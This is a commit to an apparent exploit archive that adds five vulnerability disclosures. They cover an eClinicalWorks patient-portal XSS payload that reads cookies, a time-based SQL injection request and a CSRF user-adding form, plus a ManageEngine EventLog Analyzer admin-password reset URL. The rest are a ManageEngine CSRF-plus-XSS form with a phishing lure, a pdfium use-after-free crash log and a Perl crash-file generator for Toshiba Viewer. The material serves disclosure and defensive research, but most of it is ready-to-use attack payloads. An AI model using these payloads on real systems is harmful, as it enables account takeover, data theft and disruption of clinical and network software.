DB: 2016-02-03

5 new exploits
2016-02-03 05:02:35 +00:00 · 2016-02-03 05:02:35 +00:00 · 970933a341
commit 970933a341
parent 2ec2bcdde4
6 changed files with 413 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -15217,7 +15217,7 @@ id,file,description,date,author,platform,type,port
 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk <= 8.0.0.12 Database Disclosure Exploit",2011-07-07,@ygoltsev,jsp,webapps,0
 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal Vulnerability",2011-07-08,"SecPod Research",hardware,remote,0
 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - XSS Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
-17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0
+17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution Exploit",2011-07-08,wofeiwo,php,webapps,0
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - (.ZIP) Buffer Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,local,0
 17512,platforms/windows/dos/17512.pl,"ZipItFast 3.0 - (.ZIP) Heap Overflow Exploit",2011-07-08,"C4SS!0 G0M3S",windows,dos,0
 17513,platforms/windows/remote/17513.rb,"Blue Coat Authentication and Authorization Agent (BCAAA) 5 - Buffer Overflow",2011-07-09,metasploit,windows,remote,0
@ -35632,7 +35632,12 @@ id,file,description,date,author,platform,type,port
 39390,platforms/lin_x86-64/shellcode/39390.c,"x86_64 Linux Polymorphic Execve-Stack - 47 bytes",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39391,platforms/java/webapps/39391.txt,"Hippo CMS 10.1 - Multiple Vulnerabilities",2016-02-01,LiquidWorm,java,webapps,80
 39393,platforms/windows/dos/39393.txt,"Autonics DAQMaster 1.7.3 - DQP Parsing Buffer Overflow Code Execution",2016-02-01,LiquidWorm,windows,dos,0
+39394,platforms/multiple/webapps/39394.txt,"ManageEngine EventLog Analyzer 4.0 - 10 - Privilege Escalation",2016-02-01,GraphX,multiple,webapps,80
 39395,platforms/windows/dos/39395.txt,"WPS Office < 2016 - .ppt Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
 39396,platforms/windows/dos/39396.txt,"WPS Office < 2016 - .doc OneTableDocumentStream Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
 39397,platforms/windows/dos/39397.txt,"WPS Office < 2016 - .ppt drawingContainer Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
 39398,platforms/windows/dos/39398.txt,"WPS Office < 2016 - .xls Heap Memory Corruption",2016-02-01,"Francis Provencher",windows,dos,0
+39399,platforms/multiple/webapps/39399.txt,"Manage Engine Network Configuration Manager Build 11000 - CSRF",2016-02-02,"Kaustubh G. Padwad",multiple,webapps,0
+39400,platforms/windows/dos/39400.pl,"Toshiba Viewer v2 p3console - Local Denial of Service",2016-02-02,JaMbA,windows,dos,0
+39401,platforms/multiple/dos/39401.txt,"pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free",2016-02-02,"Google Security Research",multiple,dos,0
+39402,platforms/jsp/webapps/39402.txt,"eClinicalWorks (CCMR) - Multiple Vulnerabilities",2016-02-02,"Jerold Hoong",jsp,webapps,80
--- a/platforms/jsp/webapps/39402.txt
+++ b/platforms/jsp/webapps/39402.txt
@ -0,0 +1,100 @@
+# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities
+# Vendor: https://www.eclinicalworks.com
+# Product: eClinicalWorks Population Health (CCMR) Client Portal Software 
+# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/
+# Credit: Jerold Hoong
+
+-------------------------------------
+
+# CVE-2015-4591 CROSS-SITE SCRIPTING
+Cross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population
+Health (CCMR) Client Portal Software allows remote authenticated users to inject
+arbitrary javascript via the strMessage parameter.
+
+https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=
+%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E
+
+-------------------------------------
+
+# CVE-2015-4592 SQL INJECTION
+SQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population
+Health (CCMR) Client Portal Software allows remote authenticated users to inject
+arbitrary malicious database commands as part of user input.
+
+Parameter: uemail (POST PARAMETER)
+Type: stacked queries
+Title: Microsoft SQL Server/Sybase stacked queries (comment)
+Payload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=
+&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=
+
+POST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1
+Host: 127.0.0.1:443
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Referer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp
+Content-Length: 186
+[SNIP] ...
+Connection: keep-alive
+Pragma: no-cache
+Cache-Control: no-cache
+[SNIP] ...
+
+action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=
+&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=
+
+-------------------------------------
+
+# CVE-2015-4593 CROSS-SITE REQUEST FORGERY
+Cross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks 
+Client Portal allows remote attackers to hijack the authentication of content administrators
+for requests that could lead to the creation, modification and deletion of users, appointments
+and employees.
+
+# ADDING OF USER
+<html>
+  <body>
+    <form action="https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp" method="POST">
+      <input type="hidden" name="action" value="add" />
+      <input type="hidden" name="uid" value="0" />
+      <input type="hidden" name="createdOver" value="1" />
+      <input type="hidden" name="ufname" value="John" />
+      <input type="hidden" name="ulname" value="Doe" />
+      <input type="hidden" name="uminitial" value="" />
+      <input type="hidden" name="selUserType" value="1" />
+      <input type="hidden" name="status" value="0" />
+      <input type="hidden" name="upaddress" value="" />
+      <input type="hidden" name="upcity" value="" />
+      <input type="hidden" name="upstate" value="" />
+      <input type="hidden" name="zipcode" value="" />
+      <input type="hidden" name="uemail" value="johndoe@test.com.de" />
+      <input type="hidden" name="upphone" value="98999299" />
+      <input type="hidden" name="umobileno" value="" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+-------------------------------------
+
+# CVE-2015-4594 SESSION FIXATION
+The web application is vulnerable to session fixation attacks. When authenticating a user
+the application does not assign a new session ID, making it possible to use an existent
+session ID.
+
+-------------------------------------
+
+# TIMELINE
+– 16/06/2015: Vulnerability found
+– 16/06/2015: Vendor informed
+– 16/06/2015: Request for CVE IDs
+- 16/06/2015: MITRE issued CVE numbers
+– 16/06/2015: Vendor responded requesting more information on support contract etc
+- 21/06/2015: No support contract, vendor does not open case
+- 22/06/2015: Requested update from vendor, no response
+- 01/07/2015: Contacted vendor again, vendor requested for support contract again
+- 02/07/2015: No support contract, no response from vendor
+– 31/01/2016: Public disclosure
--- a/platforms/multiple/dos/39401.txt
+++ b/platforms/multiple/dos/39401.txt
@ -0,0 +1,146 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=613
+
+The following crash was encountered in pdfium (the Chrome PDF renderer) during PDF fuzzing:
+
+--- cut ---
+$ ./pdfium_test asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed 
+Rendering PDF file asan_heap-uaf_9d42b5_2729_a5aed985095e827c725b94e7b6a4d4ed.
+Non-linearized path...
+=================================================================
+==22386==ERROR: AddressSanitizer: heap-use-after-free on address 0x606000001160 at pc 0x000000b604dc bp 0x7ffd824f3c70 sp 0x7ffd824f3c68
+READ of size 8 at 0x606000001160 thread T0
+    #0 0xb604db in opj_t2_read_packet_header third_party/libopenjpeg20/t2.c:874:54
+    #1 0xb5edd9 in opj_t2_decode_packet third_party/libopenjpeg20/t2.c:536:15
+    #2 0xb5e06c in opj_t2_decode_packets third_party/libopenjpeg20/t2.c:422:39
+    #3 0xb1b309 in opj_tcd_t2_decode third_party/libopenjpeg20/tcd.c:1555:15
+    #4 0xb1adc1 in opj_tcd_decode_tile third_party/libopenjpeg20/tcd.c:1294:15
+    #5 0xa5ef5f in opj_j2k_decode_tile third_party/libopenjpeg20/j2k.c:8065:15
+    #6 0xa9d214 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9596:23
+    #7 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
+    #8 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
+    #9 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
+    #10 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
+    #11 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
+    #12 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #13 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
+    #14 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #15 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #16 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #17 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #18 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #19 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #20 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #21 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #22 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #23 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #24 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #25 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+    #26 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+    #27 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+    #28 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+    #29 0x4f16e9 in main samples/pdfium_test.cc:608:5
+
+0x606000001160 is located 0 bytes inside of 49-byte region [0x606000001160,0x606000001191)
+freed by thread T0 here:
+    #0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
+    #1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61
+    #2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31
+    #3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23
+    #4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
+    #5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
+    #6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
+    #7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
+    #8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
+    #9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
+    #11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+    #23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+    #24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+    #25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+    #26 0x4f16e9 in main samples/pdfium_test.cc:608:5
+    #27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
+
+previously allocated by thread T0 here:
+    #0 0x4beb80 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
+    #1 0xa5bba5 in opj_j2k_read_sod third_party/libopenjpeg20/j2k.c:4359:61
+    #2 0xa5784a in opj_j2k_read_tile_header third_party/libopenjpeg20/j2k.c:7932:31
+    #3 0xa9cc56 in opj_j2k_decode_tiles third_party/libopenjpeg20/j2k.c:9568:23
+    #4 0xa51e2c in opj_j2k_exec third_party/libopenjpeg20/j2k.c:7286:41
+    #5 0xa6b690 in opj_j2k_decode third_party/libopenjpeg20/j2k.c:9796:15
+    #6 0xaba6ed in opj_jp2_decode third_party/libopenjpeg20/jp2.c:1483:8
+    #7 0xa39d8d in opj_decode third_party/libopenjpeg20/openjpeg.c:412:10
+    #8 0x786a19 in CJPX_Decoder::Init(unsigned char const*, unsigned int) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:742:11
+    #9 0x78b63c in CCodec_JpxModule::CreateDecoder(unsigned char const*, unsigned int, bool) core/src/fxcodec/codec/fx_codec_jpx_opj.cpp:866:10
+    #10 0xec1c9b in CPDF_DIBSource::LoadJpxBitmap() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:689:24
+    #11 0xeb8296 in CPDF_DIBSource::CreateDecoder() core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:645:5
+    #12 0xeb0cf9 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:365:13
+    #13 0xe8a295 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:308:7
+    #14 0xe89a99 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_cache.cpp:143:13
+    #15 0xed4f7e in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1561:11
+    #16 0xed6aaf in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1639:17
+    #17 0xe96f16 in CPDF_ImageRenderer::StartLoadDIBSource() core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:337:7
+    #18 0xe8db49 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) core/src/fpdfapi/fpdf_render/fpdf_render_image.cpp:484:7
+    #19 0xe67c11 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:320:10
+    #20 0xe76f12 in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1152:13
+    #21 0xe756c1 in CPDF_ProgressiveRenderer::Start(IFX_Pause*) core/src/fpdfapi/fpdf_render/fpdf_render.cpp:1090:3
+    #22 0x63dbd7 in FPDF_RenderPage_Retail(CRenderContext*, void*, int, int, int, int, int, int, int, IFSDK_PAUSE_Adapter*) fpdfsdk/src/fpdfview.cpp:752:3
+    #23 0x63c3af in FPDF_RenderPageBitmap fpdfsdk/src/fpdfview.cpp:507:3
+    #24 0x4ee0df in RenderPage(std::string const&, void* const&, void* const&, int, Options const&) samples/pdfium_test.cc:374:3
+    #25 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
+    #26 0x4f16e9 in main samples/pdfium_test.cc:608:5
+    #27 0x7f3425bc7ec4 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
+
+SUMMARY: AddressSanitizer: heap-use-after-free third_party/libopenjpeg20/t2.c:874:54 in opj_t2_read_packet_header
+Shadow bytes around the buggy address:
+  0x0c0c7fff81d0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
+  0x0c0c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
+  0x0c0c7fff81f0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
+  0x0c0c7fff8200: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa
+  0x0c0c7fff8210: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
+=>0x0c0c7fff8220: 00 00 00 00 00 00 00 fa fa fa fa fa[fd]fd fd fd
+  0x0c0c7fff8230: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c0c7fff8240: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
+  0x0c0c7fff8250: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
+  0x0c0c7fff8260: 00 00 00 00 fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c0c7fff8270: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Heap right redzone:      fb
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack partial redzone:   f4
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==22386==ABORTING
+--- cut ---
+
+The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551470. Attached is the PDF file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39401.zip
+
--- a/platforms/multiple/webapps/39394.txt
+++ b/platforms/multiple/webapps/39394.txt
@ -0,0 +1,51 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA512
+
+# Exploit Title: ManageEngine Eventlog Analyzer Privilege Escalation
+# Exploit Author: @GraphX
+# Vendor Homepage:http://www.manageengine.com
+# Version: 4.0 - 10
+
+
+1. Description:
+The manageengine eventlog analyzer fails to properly verify user
+privileges when making changes via the userManagementForm.do.  An
+unprivileged user would be allowed to make changes to any account by
+changing the USER_ID field to a number corresponding to another user.
+Testing discovered that the default admin and guest accounts are 1 and 2.
+
+Considering the recent similar vulnerabilities discovered in a more
+current version of a similar product by ManageEngine, it is possible that
+more versions of the software including current, are vulnerable. According
+to the vendor this is fixed in version 10.8.
+
+
+2. Proof of Concept
+
+        -login as an unprivileged user
+        -Use the following URL to change the admin password to "admin"
+
+http://<IP_ADDRESS>/event/userManagementForm.do?addField=false&action=request.getParameter(&password=admin&email=&USER_ID=1&Submit=Save+User+Details&userName=admin
+
+
+3. Solution:
+Upgrade to 10.8
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1
+
+iQIcBAEBCgAGBQJWr4qsAAoJEGoTpzhfiAPxDvwQAKjV4QxOQXnC+LReaCtBBx/7
+aZ8YVTrVZbWlvWoQsvksYmF5HRgQsD91pSYhbQ2IkPVGiDnl8MwTek8fnv7p62Ep
+7ZL3sv+QB2IRi73TW3uE32rD5LBikv9qrVQfnr8uI8xM+HRjX347gABYVp7TAyFq
+nq6oWT9ngdEgBMDb0x4tlCRSvodaWygeD+xOy3Pb/HlpZBMnwrvKwiRxSbvDKQw9
+kM3P3uVcRIVFLaFaEMJUrWc/iliCLPaKbd9IDXoVp4tBoFj6uMNSdR8VeIDWQg5A
+RQH0oAsx1wqJOY02BpDXkMAEAIeXH1TEFz5vOvpTubLxC34aFHabLCMWjdCc0aK
+lE9HZLfzwRADo5KtdQAmiLjlllNsOuf58MUjtdGr+ODqyDjoJOoZcqm5RUfe0M4
+EGpT0+6Xo6pWJMfM6fOnZT9OZd8hLac30Dz4GQTjFncSpVsMs9ED6NMHh4+nQiAk
+r991kL4SyjF7YDV+rG86fvbWOfNpWrHZb/yLwAvAp7OtZBkDFmwoTPVtVSJHJ9N2
+zQR4ufM0UnqVa3zKMzplngVnASStmg9HY4hxH8sUm7NYMq2ULimz1xTvg2jYoxWZ
+Fp9JsEdiT/vdCWhqBthR4B3rVc/EtDasDHdzGHvp60HihAaF9GBG7RmgHUc13lp9
+UAk1W7ydKCcFdw1HHFfL
+=RJuV
+-----END PGP SIGNATURE-----
+
+
--- a/platforms/multiple/webapps/39399.txt
+++ b/platforms/multiple/webapps/39399.txt
@ -0,0 +1,94 @@
+=========================================================================================
+Cross-Site Request Forgery Vulnerability in ManageEngine Network Configuration Management
+=========================================================================================
+
+.. contents:: Table Of Content
+
+Overview
+========
+Title:- Cross-Site Request Forgery (CSRF) Vulnerability in ManageEngine Network Configuration Management
+Author: Kaustubh G. Padwad
+Vendor: ZOHO Corp
+Product: ManageEngine Network Configuration Manager 
+Tested Version: : Network Configuration Manager Build 11000
+Severity: HIGH
+
+Advisory ID
+============
+2016-02-Manage_Engine
+
+
+About the Product:
+==================
+
+Network Configuration Manager is a web–based, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, Network Configuration Manager helps automate and take total control of the entire life cycle of device configuration management.
+
+Description: 
+============
+
+This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an device into the application. and device fileds are vulnerable tocross site scripting attack This leads to compromising the whole domain as the application. 
+
+Vulnerability Class:
+====================
+
+Cross-Site Request Forgery (CSRF) - https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
+
+How to Reproduce: (POC):
+========================
+
+* Add follwing code to webserver and send that malicious link to application Admin.
+
+* No Login Required as this is on logon Page
+
+( Soical enginering might help here 
+
+* For Example :- Device password has been changed click here to reset
+
+CSRF COde
+=========
+<html>
+
+  <body>
+
+    <form action="http://192.168.1.10:8080/netflow/jspui/j_security_check">
+
+      <input type="hidden" name="radiusUserEnabled" value="false" />
+
+      <input type="hidden" name="AUTHRULE&#95;NAME" value="Authenticator" />
+
+      <input type="hidden" name="j&#95;username" value="admin52f43&apos;><script>alert&#40;1&#41;<&#47;script>6f472a19875" />
+
+      <input type="hidden" name="j&#95;password" value="admin" />
+
+      <input type="submit" value="Submit request" />
+
+    </form>
+
+  </body>
+
+</html>
+
+
+
+
+Mitigation
+==========
+1. Download the security.xml from here https://drive.google.com/file/d/0B6Vlr2bSsrysR3N1cE82NUNJV28/view?usp=sharing
+2. Stop the NCM service.
+3. Replace the attached security.xml under NCM_Home/webapps/netflow/WEB-INF.
+4. Start the NCM service and test for the Vulnerability
+
+
+Disclosure: 
+===========
+28-JAN-2016 Repoerted to vendor
+29-JAN-2016 Fixed By Vendor
+
+#credits:
+Kaustubh Padwad
+Information Security Researcher
+kingkaustubh@me.com
+https://twitter.com/s3curityb3ast
+http://breakthesec.com
+https://www.linkedin.com/in/kaustubhpadwad
+
--- a/platforms/windows/dos/39400.pl
+++ b/platforms/windows/dos/39400.pl
@ -0,0 +1,16 @@
+#!/usr/bin/perl
+
+# Exploit Title: Toshiba viewer v2  p3console Local Denial of Service
+# Date: 02-02-2016
+# Author: JaMbA
+# Download: http://business.toshiba.com/downloads/KB/f1Ulds/9942/viewer2-cj242-v106.zip
+# Version: 2
+# Tested on: Windows 7
+
+my $file= "Crash.fax";
+my $junk= "\x41" x 2048;
+open($FILE,">$file");
+print $FILE $junk;
+print "\nCrash.fax File Created successfully\n";
+print "\ Oumaima & Tarta (Ahmadso best friend)\n";
+close($FILE);